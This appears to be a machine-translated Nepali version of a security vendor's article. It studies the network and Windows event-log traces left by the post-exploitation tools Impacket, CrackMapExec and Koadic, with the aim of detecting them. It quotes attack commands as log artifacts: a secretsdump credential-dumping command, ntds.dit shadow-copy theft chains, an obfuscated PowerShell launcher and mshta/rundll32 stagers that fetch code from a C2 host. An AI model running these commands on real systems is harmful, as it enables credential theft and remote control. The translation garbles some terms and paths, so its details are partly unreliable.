विन्डोज पूर्वाधारमा आक्रमणहरू कसरी पत्ता लगाउने: ह्याकर उपकरणहरू अध्ययन गर्दै

कर्पोरेट क्षेत्र मा आक्रमण को संख्या हरेक वर्ष बढ्दै छ: उदाहरण को लागी 2017 मा, 13% थप अद्वितीय घटनाहरू रेकर्ड गरिएको थियो 2016 मा भन्दा, र 2018 को अन्त्यमा - 27% थप घटनाहरूअघिल्लो अवधिको तुलनामा। ती सहित जहाँ मुख्य काम गर्ने उपकरण विन्डोज अपरेटिङ सिस्टम हो। 2017-2018 मा, APT Dragonfly, APT28, एपीटी मड्डीवाटर युरोप, उत्तर अमेरिका र साउदी अरेबियामा सरकारी र सैन्य संगठनहरूमा आक्रमणहरू गरियो। र हामीले यसको लागि तीनवटा उपकरणहरू प्रयोग गर्यौं - इम्प्याकेट, CrackMapExec и कोआडिक। तिनीहरूको स्रोत कोड खुला छ र GitHub मा उपलब्ध छ।

यो ध्यान दिन लायक छ कि यी उपकरणहरू प्रारम्भिक प्रवेशको लागि प्रयोग गर्दैनन्, तर पूर्वाधार भित्र आक्रमणको विकास गर्न। आक्रमणकारीहरूले परिधिको प्रवेश पछि आक्रमणको विभिन्न चरणहरूमा तिनीहरूलाई प्रयोग गर्छन्। यो, वैसे, पत्ता लगाउन गाह्रो छ र अक्सर मात्र प्रविधि को मद्दत संग नेटवर्क ट्राफिकमा सम्झौताको ट्रेसहरू पहिचान गर्दै वा अनुमति दिने उपकरणहरू पूर्वाधारमा प्रवेश गरेपछि आक्रमणकारीको सक्रिय कार्यहरू पत्ता लगाउनुहोस्। उपकरणहरूले विभिन्न प्रकारका प्रकार्यहरू प्रदान गर्दछ, फाइलहरू स्थानान्तरणदेखि रजिस्ट्रीसँग अन्तरक्रिया गर्न र रिमोट मेसिनमा आदेशहरू कार्यान्वयन गर्न। हामीले तिनीहरूको नेटवर्क गतिविधि निर्धारण गर्न यी उपकरणहरूको अध्ययन सञ्चालन गर्यौं।

हामीले के गर्न आवश्यक थियो:

• ह्याकिङ उपकरणले कसरी काम गर्छ भन्ने बुझ्नुहोस्। पत्ता लगाउनुहोस् कि आक्रमणकारीहरूले शोषण गर्न आवश्यक छ र तिनीहरूले प्रयोग गर्न सक्ने प्रविधिहरू।
• आक्रमणको पहिलो चरणमा सूचना सुरक्षा उपकरणहरूद्वारा पत्ता नलागेको कुरा पत्ता लगाउनुहोस्। या त आक्रमणकारी आन्तरिक आक्रमणकारी भएको कारणले वा आक्रमणकारीले पूर्वाधारमा भएको प्वालको शोषण गरिरहेको हुनसक्छ जुन पहिले थाहा थिएन। यो आफ्नो कार्यको सम्पूर्ण श्रृंखला पुनर्स्थापित गर्न सम्भव हुन्छ, त्यसैले थप आन्दोलन पत्ता लगाउने इच्छा।
• घुसपैठ पत्ता लगाउने उपकरणहरूबाट झूटा सकारात्मकहरू हटाउनुहोस्। हामीले बिर्सनु हुँदैन कि जब केहि कार्यहरू मात्र टोहीको आधारमा पत्ता लगाइन्छ, बारम्बार त्रुटिहरू सम्भव छन्। सामान्यतया पूर्वाधारमा त्यहाँ पर्याप्त संख्यामा तरिकाहरू छन्, कुनै पनि जानकारी प्राप्त गर्नको लागि, पहिलो नजरमा वैध व्यक्तिहरूबाट अलग गर्न सकिँदैन।

यी उपकरणहरूले आक्रमणकारीहरूलाई के दिन्छ? यदि यो इम्प्याकेट हो भने, तब आक्रमणकारीहरूले परिधि तोडेर पछ्याउने आक्रमणको विभिन्न चरणहरूमा प्रयोग गर्न सकिने मोड्युलहरूको ठूलो पुस्तकालय प्राप्त गर्छन्। धेरै उपकरणहरूले इम्प्याकेट मोड्युलहरू आन्तरिक रूपमा प्रयोग गर्छन् - उदाहरणका लागि, मेटास्प्लोइट। यसमा रिमोट कमाण्ड कार्यान्वयनको लागि dcomexec र wmiexec छ, Impacket बाट थपिएको मेमोरीबाट खाताहरू प्राप्त गर्नको लागि secretsdump। नतिजाको रूपमा, यस्तो पुस्तकालयको गतिविधिको सही पहिचानले डेरिभेटिभहरू पत्ता लगाउने सुनिश्चित गर्नेछ।

यो कुनै संयोग होइन कि सिर्जनाकर्ताहरूले CrackMapExec (वा केवल CME) को बारेमा "Impacket द्वारा संचालित" लेखे। थप रूपमा, CME सँग लोकप्रिय परिदृश्यहरूको लागि तयार-निर्मित कार्यक्षमता छ: पासवर्डहरू वा तिनीहरूको ह्यासहरू प्राप्त गर्न Mimikatz, रिमोट कार्यान्वयनको लागि Meterpreter वा साम्राज्य एजेन्टको कार्यान्वयन, र बोर्डमा ब्लडहाउन्ड।

हामीले रोजेको तेस्रो उपकरण कोआडिक थियो। यो एकदम भर्खरको हो, यो 25 मा अन्तर्राष्ट्रिय ह्याकर सम्मेलन DEFCON 2017 मा प्रस्तुत गरिएको थियो र एक गैर-मानक दृष्टिकोण द्वारा प्रतिष्ठित छ: यसले HTTP, Java Script र Microsoft Visual Basic Script (VBS) मार्फत काम गर्दछ। यस दृष्टिकोणलाई लिभ अफ ल्याण्ड भनिन्छ: उपकरणले विन्डोजमा निर्मित निर्भरता र पुस्तकालयहरूको सेट प्रयोग गर्दछ। सिर्जनाकर्ताहरूले यसलाई COM कमाण्ड र कन्ट्रोल, वा C3 भन्छन्।

IMPACKET

इम्प्याकेटको कार्यक्षमता धेरै फराकिलो छ, AD भित्रको हेरविचार र आन्तरिक MS SQL सर्भरहरूबाट डेटा सङ्कलन गर्ने, प्रमाणहरू प्राप्त गर्ने प्रविधिहरू सम्म: यो SMB रिले आक्रमण हो, र डोमेन नियन्त्रकबाट प्रयोगकर्ता पासवर्डहरूको ह्यासहरू भएको ntds.dit फाइल प्राप्त गर्ने। इम्प्याकेटले टाढैबाट चार फरक विधिहरू प्रयोग गरेर आदेशहरू कार्यान्वयन गर्दछ: WMI, विन्डोज शेड्युलर व्यवस्थापन सेवा, DCOM, र SMB, र त्यसो गर्न प्रमाणहरू आवश्यक पर्दछ।

गोप्य डम्प

सिक्रेट डम्पमा एक नजर राखौं। यो एक मोड्युल हो जसले प्रयोगकर्ता मेसिन र डोमेन नियन्त्रक दुवैलाई लक्षित गर्न सक्छ। यसलाई मेमोरी क्षेत्रहरू LSA, SAM, SECURITY, NTDS.dit को प्रतिलिपिहरू प्राप्त गर्न प्रयोग गर्न सकिन्छ, त्यसैले यो आक्रमणको विभिन्न चरणहरूमा देख्न सकिन्छ। मोड्युलको सञ्चालनको पहिलो चरण SMB मार्फत प्रमाणीकरण हो, जसमा प्रयोगकर्ताको पासवर्ड वा यसको ह्यासलाई स्वचालित रूपमा पास द ह्यास आक्रमण गर्न आवश्यक पर्दछ। त्यसपछि सेवा नियन्त्रण प्रबन्धक (SCM) मा पहुँच खोल्न र winreg प्रोटोकल मार्फत रजिस्ट्रीमा पहुँच प्राप्त गर्न अनुरोध आउँछ, जसको प्रयोग गरेर आक्रमणकारीले चासोका शाखाहरूको डेटा पत्ता लगाउन र SMB मार्फत परिणामहरू प्राप्त गर्न सक्छ।

चित्रमा। 1 हामी देख्छौं कि कसरी वास्तवमा winreg प्रोटोकल प्रयोग गर्दा, LSA सँग रजिस्ट्री कुञ्जी प्रयोग गरेर पहुँच प्राप्त गरिन्छ। यो गर्नका लागि, opcode 15 - OpenKey सँग DCERPC आदेश प्रयोग गर्नुहोस्।

चामल। 1. winreg प्रोटोकल प्रयोग गरेर रजिस्ट्री कुञ्जी खोल्दै

अर्को, जब कुञ्जीमा पहुँच प्राप्त हुन्छ, मानहरू सेभकी कमाण्डको साथ opcode 20 को साथ बचत गरिन्छ। Impacket ले यो धेरै विशिष्ट तरिकामा गर्छ। यसले मानहरूलाई फाइलमा बचत गर्छ जसको नाम .tmp सँग जोडिएको 8 अनियमित वर्णहरूको स्ट्रिङ हो। थप रूपमा, यस फाइलको थप अपलोड SMB मार्फत System32 डाइरेक्टरीबाट हुन्छ (चित्र 2)।

चामल। 2. रिमोट मेसिनबाट रजिस्ट्री कुञ्जी प्राप्त गर्ने योजना

यो बाहिर जान्छ कि नेटवर्कमा यस्तो गतिविधि winreg प्रोटोकल, विशिष्ट नाम, आदेश र तिनीहरूको अर्डर प्रयोग गरेर निश्चित रजिस्ट्री शाखाहरूमा प्रश्नहरू द्वारा पत्ता लगाउन सकिन्छ।

यो मोड्युलले Windows घटना लगमा ट्रेसहरू पनि छोड्छ, यसलाई पत्ता लगाउन सजिलो बनाउँछ। उदाहरण को लागी, आदेश कार्यान्वयन को परिणाम को रूप मा

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

विन्डोज सर्भर 2016 लगमा हामी घटनाहरूको निम्न कुञ्जी अनुक्रम देख्नेछौं:

1. 4624 - रिमोट लगइन।
2. 5145 - winreg रिमोट सेवामा पहुँच अधिकार जाँच गर्दै।
3. 5145 - System32 डाइरेक्टरीमा फाइल पहुँच अधिकारहरू जाँच गर्दै। फाइलमा माथि उल्लेखित अनियमित नाम छ।
4. 4688 - vssadmin सुरु गर्ने cmd.exe प्रक्रिया सिर्जना गर्दै:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - आदेशको साथ प्रक्रिया सिर्जना गर्दै:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - आदेशको साथ प्रक्रिया सिर्जना गर्दै:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - आदेशको साथ प्रक्रिया सिर्जना गर्दै:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

धेरै पोस्ट-शोषण उपकरणहरू जस्तै, इम्प्याकेटमा रिमोट आदेश कार्यान्वयनको लागि मोड्युलहरू छन्। हामी smbexec मा फोकस गर्नेछौं, जसले रिमोट मेसिनमा अन्तरक्रियात्मक आदेश शेल प्रदान गर्दछ। यो मोड्युललाई पासवर्ड वा पासवर्ड ह्यासको साथ SMB मार्फत प्रमाणीकरण पनि चाहिन्छ। चित्रमा। 3 हामीले यस्तो उपकरण कसरी काम गर्छ भन्ने उदाहरण देख्छौं, यस अवस्थामा यो स्थानीय प्रशासक कन्सोल हो।

चामल। 3. अन्तरक्रियात्मक smbexec कन्सोल

प्रमाणीकरण पछि smbexec को पहिलो चरण OpenSCManagerW आदेश (15) को साथ SCM खोल्नु हो। प्रश्न उल्लेखनीय छ: MachineName फिल्ड DUMMY हो।

चामल। 4. सेवा नियन्त्रण प्रबन्धक खोल्न अनुरोध गर्नुहोस्

अर्को, सेवा CreateServiceW आदेश (12) प्रयोग गरेर सिर्जना गरिएको छ। smbexec को मामला मा, हामी प्रत्येक पटक समान आदेश निर्माण तर्क देख्न सक्छौं। चित्रमा। 5 हरियोले अपरिवर्तनीय आदेश प्यारामिटरहरू संकेत गर्दछ, पहेंलोले आक्रमणकर्ताले के परिवर्तन गर्न सक्छ भनेर संकेत गर्दछ। यो देख्न सजिलो छ कि कार्यान्वयनयोग्य फाइलको नाम, यसको डाइरेक्टरी र आउटपुट फाइल परिवर्तन गर्न सकिन्छ, तर बाँकी इम्प्याकेट मोड्युलको तर्कलाई गडबड नगरी परिवर्तन गर्न धेरै गाह्रो छ।

चामल। 5. सेवा नियन्त्रण प्रबन्धक प्रयोग गरी सेवा सिर्जना गर्न अनुरोध गर्नुहोस्

Smbexec ले Windows घटना लगमा स्पष्ट ट्रेसहरू पनि छोड्छ। ipconfig आदेशको साथ अन्तरक्रियात्मक आदेश शेलको लागि Windows सर्भर 2016 लग मा, हामी घटनाहरूको निम्न कुञ्जी अनुक्रम देख्नेछौं:

1. 4697 - पीडितको मेसिनमा सेवाको स्थापना:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - बिन्दु 1 बाट तर्क संग cmd.exe प्रक्रिया को निर्माण।
3. 5145 - C$ डाइरेक्टरीमा __आउटपुट फाइलमा पहुँच अधिकार जाँच गर्दै।
4. 4697 - पीडितको मेसिनमा सेवाको स्थापना।

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - बिन्दु 4 बाट तर्क संग cmd.exe प्रक्रिया को निर्माण।
6. 5145 - C$ डाइरेक्टरीमा __आउटपुट फाइलमा पहुँच अधिकार जाँच गर्दै।

इम्प्याकेट आक्रमण उपकरणहरूको विकासको लागि आधार हो। यसले Windows पूर्वाधारमा लगभग सबै प्रोटोकलहरूलाई समर्थन गर्दछ र एकै समयमा यसको आफ्नै विशेषता सुविधाहरू छन्। यहाँ विशिष्ट winreg अनुरोधहरू छन्, र SCM API को विशेषता आदेश गठन, र फाइल नाम ढाँचा, र SMB साझेदारी SYSTEM32 को प्रयोग।

CRACKMAPEXEC

CME उपकरण मुख्य रूपमा ती दिनचर्या कार्यहरू स्वचालित गर्न डिजाइन गरिएको हो जुन आक्रमणकर्ताले नेटवर्क भित्र अगाडि बढ्नको लागि प्रदर्शन गर्नुपर्दछ। यसले तपाईंलाई प्रसिद्ध एम्पायर एजेन्ट र मिटरप्रिटरसँग संयोजनमा काम गर्न अनुमति दिन्छ। गुप्त रूपमा आदेशहरू कार्यान्वयन गर्न, CME तिनीहरूलाई अस्पष्ट गर्न सक्छ। ब्लडहाउन्ड (एक छुट्टै टोही उपकरण) को प्रयोग गरेर, एक आक्रमणकारीले सक्रिय डोमेन प्रशासक सत्रको लागि खोजलाई स्वचालित गर्न सक्छ।

Bloodhound

ब्लडहाउन्ड, एक स्ट्यान्डअलोन उपकरणको रूपमा, नेटवर्क भित्र उन्नत टोपनको लागि अनुमति दिन्छ। यसले प्रयोगकर्ताहरू, मेसिनहरू, समूहहरू, सत्रहरूको बारेमा डेटा सङ्कलन गर्दछ र PowerShell स्क्रिप्ट वा बाइनरी फाइलको रूपमा आपूर्ति गरिन्छ। LDAP वा SMB-आधारित प्रोटोकलहरू जानकारी सङ्कलन गर्न प्रयोग गरिन्छ। CME एकीकरण मोड्युलले ब्लडहाउन्डलाई पीडितको मेसिनमा डाउनलोड गर्न, कार्यान्वयन पछि सङ्कलन डाटा चलाउन र प्राप्त गर्न अनुमति दिन्छ, जसले गर्दा प्रणालीमा स्वचालित कार्यहरू हुन्छन् र तिनीहरूलाई कम ध्यान दिन सकिन्छ। ब्लडहाउन्ड ग्राफिकल शेलले सङ्कलन गरिएका डाटाहरूलाई ग्राफको रूपमा प्रस्तुत गर्दछ, जसले तपाईंलाई आक्रमणकारीको मेसिनबाट डोमेन प्रशासकसम्मको छोटो बाटो फेला पार्न अनुमति दिन्छ।

चामल। 6. ब्लडहाउन्ड इन्टरफेस

पीडितको मेसिनमा चलाउनको लागि, मोड्युलले ATSVC र SMB प्रयोग गरेर कार्य सिर्जना गर्दछ। ATSVC Windows Task Scheduler सँग काम गर्ने इन्टरफेस हो। CME ले नेटवर्कमा कार्यहरू सिर्जना गर्न यसको NetrJobAdd(1) प्रकार्य प्रयोग गर्दछ। CME मोड्युलले के पठाउँछ भन्ने उदाहरण चित्रमा देखाइएको छ। 7: यो XML ढाँचामा तर्कको रूपमा cmd.exe आदेश कल र अस्पष्ट कोड हो।

चित्र ७। CME मार्फत कार्य सिर्जना गर्दै

कार्य कार्यान्वयनको लागि पेश गरिसकेपछि, पीडितको मेसिनले ब्लडहाउन्ड आफै सुरु गर्छ, र यो ट्राफिकमा देख्न सकिन्छ। मोड्युललाई मानक समूहहरू, डोमेनमा रहेका सबै मेसिन र प्रयोगकर्ताहरूको सूची, र SRVSVC NetSessEnum अनुरोध मार्फत सक्रिय प्रयोगकर्ता सत्रहरूको बारेमा जानकारी प्राप्त गर्न LDAP क्वेरीहरूद्वारा विशेषता गरिएको छ।

चामल। 8. SMB मार्फत सक्रिय सत्रहरूको सूची प्राप्त गर्दै

थप रूपमा, अडिटिङ सक्षम भएको पीडितको मेसिनमा ब्लडहाउन्ड सुरु गर्दा ID 4688 (प्रक्रिया सिर्जना) र प्रक्रियाको नाम भएको घटनासँगै हुन्छ। «C:WindowsSystem32cmd.exe»। यसको बारेमा के उल्लेखनीय छ कमाण्ड लाइन तर्कहरू:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts मोड्युल कार्यक्षमता र कार्यान्वयनको दृष्टिकोणबाट धेरै रोचक छ। WMI ले तपाईंलाई WQL क्वेरी भाषा प्रयोग गर्न अनुमति दिन्छ विभिन्न Windows वस्तुहरूबाट डाटा पुन: प्राप्त गर्न, जुन अनिवार्य रूपमा यो CME मोड्युलले प्रयोग गर्दछ। यसले पीडितको मेसिनमा स्थापना गरिएका सुरक्षा उपकरणहरूको बारेमा AntiSpywareProduct र AntiMirusProduct कक्षाहरूमा प्रश्नहरू उत्पन्न गर्छ। आवश्यक डाटा प्राप्त गर्नको लागि, मोड्युल rootSecurityCenter2 नेमस्पेसमा जडान हुन्छ, त्यसपछि WQL क्वेरी उत्पन्न गर्दछ र प्रतिक्रिया प्राप्त गर्दछ। चित्रमा। चित्र 9 ले त्यस्ता अनुरोध र प्रतिक्रियाहरूको सामग्री देखाउँछ। हाम्रो उदाहरणमा, विन्डोज डिफेन्डर फेला पर्यो।

चामल। 9. enum_avproducts मोड्युलको नेटवर्क गतिविधि

अक्सर, WMI अडिटिङ (ट्रेस WMI-Activity), जसका घटनाहरूमा तपाईंले WQL प्रश्नहरूको बारेमा उपयोगी जानकारी पाउन सक्नुहुन्छ, असक्षम हुन सक्छ। तर यदि यो सक्षम पारिएको छ भने, enum_avproducts स्क्रिप्ट चलाइएको छ भने, ID 11 भएको घटना बचत हुनेछ। यसमा अनुरोध पठाउने प्रयोगकर्ताको नाम र rootSecurityCenter2 नेमस्पेसमा नाम समावेश हुनेछ।

प्रत्येक CME मोड्युलको आफ्नै कलाकृतिहरू थिए, यो विशिष्ट WQL प्रश्नहरू होस् वा LDAP र SMB मा अस्पष्टता र ब्लडहाउन्ड-विशिष्ट गतिविधिको साथ कार्य तालिकामा एक निश्चित प्रकारको कार्यको सिर्जना।

KOADIC

Koadic को एक विशिष्ट विशेषता Windows मा निर्मित JavaScript र VBScript व्याख्याकर्ताहरूको प्रयोग हो। यस अर्थमा, यसले ल्यान्ड अफ द लिभिङ ट्रेन्डलाई पछ्याउँछ - त्यो हो, यसमा कुनै बाह्य निर्भरता छैन र मानक विन्डोज उपकरणहरू प्रयोग गर्दछ। यो पूर्ण कमाण्ड एन्ड कन्ट्रोल (CnC) को लागि एक उपकरण हो, किनकि संक्रमण पछि मेसिनमा "इम्प्लान्ट" स्थापना गरिन्छ, यसलाई नियन्त्रण गर्न अनुमति दिन्छ। यस्तो मेसिन, कोआडिक शब्दावलीमा, "जोम्बी" भनिन्छ। यदि पीडितको पक्षमा पूर्ण सञ्चालनको लागि अपर्याप्त विशेषाधिकारहरू छन् भने, Koadic सँग प्रयोगकर्ता खाता नियन्त्रण बाइपास (UAC बाईपास) प्रविधिहरू प्रयोग गरेर तिनीहरूलाई उठाउने क्षमता छ।

चामल। 10. कोआडिक शेल

पीडितले आदेश र नियन्त्रण सर्भरसँग सञ्चार सुरु गर्नुपर्छ। यो गर्नको लागि, उसले पहिले तयार गरिएको URI लाई सम्पर्क गर्न आवश्यक छ र स्टेजरहरू मध्ये एक प्रयोग गरेर मुख्य कोआडिक शरीर प्राप्त गर्न आवश्यक छ। चित्रमा। चित्र 11 ले mshta स्टेजरको लागि उदाहरण देखाउँछ।

चामल। 11. CnC सर्भरको साथ सत्र सुरु गर्दै

प्रतिक्रिया चर WS को आधारमा, यो स्पष्ट हुन्छ कि कार्यान्वयन WScript.Shell मार्फत हुन्छ, र चर STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE हालको सत्रको प्यारामिटरहरूको बारेमा मुख्य जानकारी समावेश गर्दछ। यो CnC सर्भरसँग HTTP जडानमा पहिलो अनुरोध-प्रतिक्रिया जोडी हो। त्यसपछिका अनुरोधहरू सीधै भनिन्छ मोड्युल (इम्प्लान्ट) को कार्यक्षमतासँग सम्बन्धित छन्। सबै Koadic मोड्युलहरू CnC सँग सक्रिय सत्रको साथ मात्र काम गर्छन्।

Mimikatz

जसरी CME ब्लडहाउन्डसँग काम गर्दछ, Koadic सँग Mimikatz सँग छुट्टै कार्यक्रमको रूपमा काम गर्दछ र यसलाई सुरु गर्ने धेरै तरिकाहरू छन्। तल Mimikatz इम्प्लान्ट डाउनलोड गर्नको लागि अनुरोध-प्रतिक्रिया जोडी छ।

चामल। 12. Mimikatz Koadic मा स्थानान्तरण गर्नुहोस्

तपाईंले अनुरोधमा URI ढाँचा कसरी परिवर्तन भएको छ भनेर हेर्न सक्नुहुन्छ। यसले अब csrf चरको लागि मान समावेश गर्दछ, जुन चयन गरिएको मोड्युलको लागि जिम्मेवार छ। उनको नाममा ध्यान नदिनुहोस्; हामी सबैलाई थाहा छ कि CSRF लाई सामान्यतया फरक तरिकाले बुझिन्छ। प्रतिक्रिया Koadic को एउटै मुख्य शरीर थियो, जसमा Mimikatz सम्बन्धित कोड थपिएको थियो। यो एकदम ठूलो छ, त्यसैले मुख्य बिन्दुहरू हेरौं। यहाँ हामीसँग बेस64 मा एन्कोड गरिएको Mimikatz पुस्तकालय छ, एक क्रमबद्ध .NET क्लास जसले यसलाई इन्जेक्ट गर्नेछ, र Mimikatz सुरु गर्न तर्कहरू छन्। कार्यान्वयन परिणाम स्पष्ट पाठमा नेटवर्कमा प्रसारित हुन्छ।

चामल। 13. रिमोट मेसिनमा Mimikatz चलाउने परिणाम

Exec_cmd

Koadic मा मोड्युलहरू पनि छन् जसले टाढाबाट आदेशहरू कार्यान्वयन गर्न सक्छ। यहाँ हामी उही URI जेनेरेशन विधि र परिचित sid र csrf चरहरू देख्नेछौं। exec_cmd मोड्युलको अवस्थामा, कोड शरीरमा थपिएको छ जुन शेल आदेशहरू कार्यान्वयन गर्न सक्षम छ। CnC सर्भरको HTTP प्रतिक्रियामा समावेश गरिएको यस्तो कोड तल देखाइएको छ।

चामल। 14. प्रत्यारोपण कोड exec_cmd

परिचित WS विशेषता भएको GAWTUUGCFI चर कोड कार्यान्वयनको लागि आवश्यक छ। यसको मद्दतले, प्रत्यारोपणले शेललाई कल गर्दछ, कोडका दुई शाखाहरू प्रशोधन गर्दछ - shell.exec आउटपुट डाटा स्ट्रिम र shell.run फिर्ता नगरी फिर्ता।

Koadic एक सामान्य उपकरण होइन, तर यसको आफ्नै कलाकृतिहरू छन् जसद्वारा यो वैध ट्राफिकमा फेला पार्न सकिन्छ:

• HTTP अनुरोधहरूको विशेष गठन,
• winHttpRequests API प्रयोग गरेर,
• ActiveXObject मार्फत WScript.Shell वस्तु सिर्जना गर्दै,
• ठूलो निष्पादन योग्य निकाय।

प्रारम्भिक जडान स्टेजर द्वारा प्रारम्भ गरिएको छ, त्यसैले विन्डोज घटनाहरू मार्फत यसको गतिविधि पत्ता लगाउन सम्भव छ। mshta को लागि, यो घटना 4688 हो, जसले सुरु विशेषताको साथ प्रक्रियाको सिर्जनालाई संकेत गर्दछ:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

जब Koadic चलिरहेको छ, तपाईले अन्य 4688 घटनाहरू देख्न सक्नुहुन्छ विशेषताहरू जुन यसलाई पूर्ण रूपमा विशेषता गर्दछ:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

निष्कर्ष

जग्गा बाहिर बस्ने प्रवृत्ति अपराधीहरूमाझ लोकप्रिय हुँदै गएको छ। तिनीहरूले आफ्नो आवश्यकताको लागि Windows मा निर्मित उपकरणहरू र संयन्त्रहरू प्रयोग गर्छन्। हामीले लोकप्रिय उपकरणहरू Koadic, CrackMapExec र Impacket यस सिद्धान्तलाई अनुसरण गर्दै APT रिपोर्टहरूमा बढ्दो रूपमा देखा परिरहेका छौं। यी उपकरणहरूको लागि GitHub मा फोर्कहरूको संख्या पनि बढ्दै गएको छ, र नयाँहरू देखा पर्दैछन् (त्यहाँ पहिले नै ती मध्ये हजारौं छन्)। प्रवृति यसको सरलताको कारणले लोकप्रियता प्राप्त गर्दैछ: आक्रमणकारीहरूलाई तेस्रो-पक्ष उपकरणहरू आवश्यक पर्दैन; तिनीहरू पहिले नै पीडितहरूको मेसिनमा छन् र तिनीहरूलाई सुरक्षा उपायहरू बाइपास गर्न मद्दत गर्दछ। हामी नेटवर्क संचारको अध्ययनमा ध्यान केन्द्रित गर्छौं: माथि वर्णन गरिएको प्रत्येक उपकरणले नेटवर्क ट्राफिकमा आफ्नै ट्रेसहरू छोड्छ; तिनीहरूको विस्तृत अध्ययनले हामीलाई हाम्रो उत्पादन सिकाउन अनुमति दियो पीटी नेटवर्क आक्रमण खोज तिनीहरूलाई पत्ता लगाउनुहोस्, जसले अन्ततः तिनीहरूमा संलग्न साइबर घटनाहरूको सम्पूर्ण श्रृंखलाको अनुसन्धान गर्न मद्दत गर्दछ।

लेखक:

• एन्टोन ट्युरिन, विशेषज्ञ सेवा विभाग प्रमुख, पीटी विशेषज्ञ सुरक्षा केन्द्र, सकारात्मक टेक्नोलोजीहरू
• Egor Podmokov, विशेषज्ञ, PT विशेषज्ञ सुरक्षा केन्द्र, सकारात्मक टेक्नोलोजी

स्रोत: www.habr.com